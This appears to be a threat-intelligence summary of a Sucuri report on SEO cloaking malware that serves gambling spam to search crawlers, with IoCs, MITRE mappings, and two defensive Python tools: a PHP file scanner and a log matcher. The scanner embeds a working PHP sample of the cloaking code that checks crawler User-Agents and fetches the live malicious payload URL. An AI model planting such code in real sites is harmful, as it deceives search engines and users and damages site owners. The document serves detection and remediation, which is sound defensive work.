A professional-grade SEO cloaking campaign turned a legitimate site into a double agent by serving normal content to human visitors while delivering gambling spam to search-engine crawlers. The attack used the domain fugthatshit[.]baby and a remote payload (hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt) served from IP 104.21.50.131; recommended remediation includes removing the malicious code appended to pages/index/IndexHandler.php, blocklisting the domain/IP, auditing users, resetting credentials, and deploying a WAF.
Key points
- The campaign is an SEO cloaking attack that shows spam to search-engine bots while hiding it from regular visitors.
- Malicious code was appended to a legitimate file: pages/index/IndexHandler.php, making the modification hard to spot.
- The attackers fetched spam content remotely from fugthatshit[.]baby (payload at hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt) using a cURL-based function.
- The script detects crawlers by checking User-Agent strings (Googlebot, Bingbot, Baiduspider) and only injects spam for bots.
- The site’s SEO and domain reputation are at risk of manual penalties or blacklist actions by search engines if cloaking is detected.
- Recommended remediation: remove malicious files, audit and remove suspicious users, reset credentials, scan endpoints, monitor outgoing traffic, update software, and deploy a WAF.
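The key points above describe a specific shape of infection: legitimate handler logic with a block appended at the bottom that reads the User-Agent, matches crawler names, and pulls remote content with cURL. The following scanner is an added example (not code from the Sucuri post or from the infected site) that looks for exactly that combination in PHP files. The PHP samples inside it are constructed to mirror the description; the only values taken from the page are the domain, the payload file name and the bot names.

```python
"""Added example, not code from the Sucuri post: a static scan for the cloaking
pattern the summary describes, i.e. an appended block that keys on crawler
User-Agents (Googlebot/Bingbot/Baiduspider) and pulls remote content with cURL.
The PHP samples below are constructed for the demo; the domain and file names
are the IoCs the summary lists."""
import os
import re
from dataclasses import dataclass, field

# Constructed sample modelled on the described infection: legitimate handler
# logic first, cloaking code appended at the bottom of the same file.
SAMPLE_INFECTED_PHP = r"""<?php
class IndexHandler {
    public function render() { return view('index'); }
}
// --- appended below the legitimate logic ---
function fetchContentCurl($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $out = curl_exec($ch);
    curl_close($ch);
    return $out;
}
if (preg_match('/googlebot|bingbot|baiduspider/i', $_SERVER['HTTP_USER_AGENT'])) {
    echo fetchContentCurl('https://fugthatshit.baby/desktop/kindipublisher.txt');
}
"""

SAMPLE_CLEAN_PHP = r"""<?php
class IndexHandler {
    public function render() { return view('index'); }
}
"""

BOTS = r"(?:googlebot|bingbot|baiduspider)"
# Each rule alone is noisy (plenty of legitimate code reads the User-Agent);
# the verdict below only fires on the combination, or on a known IoC.
RULES = {
    # bot names and HTTP_USER_AGENT within 300 chars of each other, either order
    "bot_ua_check": re.compile(
        BOTS + r".{0,300}?HTTP_USER_AGENT|HTTP_USER_AGENT.{0,300}?" + BOTS, re.I | re.S),
    # outbound fetch of remote content
    "remote_fetch": re.compile(r"\bcurl_exec\s*\(|file_get_contents\s*\(\s*['\"]https?://", re.I),
    # indicators taken from the summary
    "known_ioc": re.compile(r"fugthatshit\.baby|kindipublisher\.txt", re.I),
}


@dataclass
class Finding:
    path: str
    hits: dict = field(default_factory=dict)  # rule name -> first line that hit

    @property
    def cloaking_suspected(self) -> bool:
        both_halves = "bot_ua_check" in self.hits and "remote_fetch" in self.hits
        return both_halves or "known_ioc" in self.hits


def scan_php(path: str, content: str) -> Finding:
    """Apply every rule to one file's content, recording the first matching line."""
    finding = Finding(path)
    for name, rx in RULES.items():
        m = rx.search(content)
        if m:
            finding.hits[name] = content.count("\n", 0, m.start()) + 1
    return finding


def scan_tree(root: str) -> list:
    """Walk a webroot and return only the files the rules flag."""
    flagged = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith((".php", ".phtml")):
                p = os.path.join(dirpath, n)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    f = scan_php(p, fh.read())
                if f.cloaking_suspected:
                    flagged.append(f)
    return flagged


if __name__ == "__main__":
    for label, src in (("infected", SAMPLE_INFECTED_PHP), ("clean", SAMPLE_CLEAN_PHP)):
        f = scan_php(f"pages/index/IndexHandler.php ({label})", src)
        print(f.path, "->", "SUSPECT" if f.cloaking_suspected else "ok", f.hits)
```

The line numbers in `hits` are what you want in a ticket: they point at the appended block rather than the legitimate code above it, which is the part a quick visual review of the file tends to miss. Point `scan_tree` at a webroot to sweep every PHP file the same way.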
MITRE Techniques
- [T1588.002] Acquire Infrastructure: Domains – Attackers registered and used the domain fugthatshit[.]baby to host spam content and payloads (‘The malicious domain involved was: fugthatshit[.]baby’).
- [T1105] Ingress Tool Transfer – The server retrieved an external payload file (kindipublisher.txt) from the attacker’s host to inject spam (‘The payload was hosted at: hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt’).
- [T1071.001] Application Layer Protocol: Web Protocols – The malware used a cURL-based function to fetch remote spam content over HTTP(S) (‘uses a function called fetchContentCurl to grab the latest “Situs Toto” links from an attacker-controlled server at fugthatshit[.]baby’).
- [T1036.005] Masquerading: Match Legitimate Name – Malicious PHP was appended to an otherwise legitimate file (pages/index/IndexHandler.php) to hide its presence from developers (‘The malware was embedded inside a legitimate file pages/index/IndexHandler.php… additional PHP code was appended’).
- [T1027] Obfuscated Files or Information – The appended code and retrieval behavior concealed malicious functionality within normal application logic to avoid detection (‘The file appeared normal at first glance and contained real application logic. However, at the bottom of the file, additional PHP code was appended.’).
Indicators of Compromise
- [Domain] malicious content host – fugthatshit[.]baby
- [URL] remote payload delivering spam – hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt
- [IP address] hosting/blocklist candidate – 104.21.50.131
- [File name / path] infected application file – pages/index/IndexHandler.php; payload file kindipublisher.txt
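The indicators above are most useful when matched against the server's own egress and access logs, since the giveaway of this campaign is the web server process itself fetching the payload. The matcher below is an added example (not from the Sucuri post); the log lines it carries are constructed, the crawler address 198.51.100.7 is a TEST-NET placeholder, and only the domain, IP and paths come from the IoC list.

```python
"""Added example, not code from the Sucuri post: match the listed IoCs (domain,
IP, payload path, infected file) against egress and web-access log lines so a
fetch of the payload by the web server itself stands out. Log lines are
constructed; the IP 198.51.100.7 is a TEST-NET placeholder for a crawler."""
import re
from collections import Counter

IOCS = {
    "domain": {"fugthatshit.baby"},
    "ip": {"104.21.50.131"},
    "path": {"/desktop/kindipublisher.txt", "pages/index/IndexHandler.php"},
}
_HOST_RX = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)
_IP_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

SAMPLE_LOGS = [
    # egress/proxy log: the web server process pulling the spam payload
    "2026-01-14T10:02:11Z www-data CONNECT 104.21.50.131:443 host=fugthatshit.baby "
    "GET /desktop/kindipublisher.txt 200",
    # access log: a crawler User-Agent hitting the page the handler serves
    '198.51.100.7 - - [14/Jan/2026:10:02:10 +0000] "GET /index HTTP/1.1" 200 18321 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    # benign outbound call to an unrelated API
    "2026-01-14T10:03:00Z www-data CONNECT 192.0.2.10:443 host=api.example.com GET /v1/status 200",
]


def match_line(line: str) -> list:
    """Return (kind, value) pairs for every IoC present in one log line."""
    hits = []
    for host in _HOST_RX.findall(line):
        h = host.lower()
        # exact match or a subdomain of a listed domain
        if any(h == d or h.endswith("." + d) for d in IOCS["domain"]):
            hits.append(("domain", h))
    for ip in _IP_RX.findall(line):
        if ip in IOCS["ip"]:
            hits.append(("ip", ip))
    for p in IOCS["path"]:
        if p in line:
            hits.append(("path", p))
    return list(dict.fromkeys(hits))  # dedupe, keep first-seen order


def scan_logs(lines) -> dict:
    """Map line index -> hits, for lines that contain at least one IoC."""
    return {i: h for i, l in enumerate(lines) if (h := match_line(l))}


def summarize(lines) -> Counter:
    """Count how often each IoC appears across all lines."""
    return Counter(hit for hits in scan_logs(lines).values() for hit in hits)


if __name__ == "__main__":
    for i, hits in scan_logs(SAMPLE_LOGS).items():
        print(f"line {i}: {hits}")
    print(summarize(SAMPLE_LOGS))
```

Only the first constructed line fires, and it fires on all three indicators at once: the domain, the IP and the payload path. That is the signal to alert on, an outbound request from the web server's own user, whereas the Googlebot request on the second line is normal traffic and matches nothing by itself.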
Read more: https://blog.sucuri.net/2026/01/google-sees-spam-you-see-your-site-a-cloaked-seo-spam-attack.html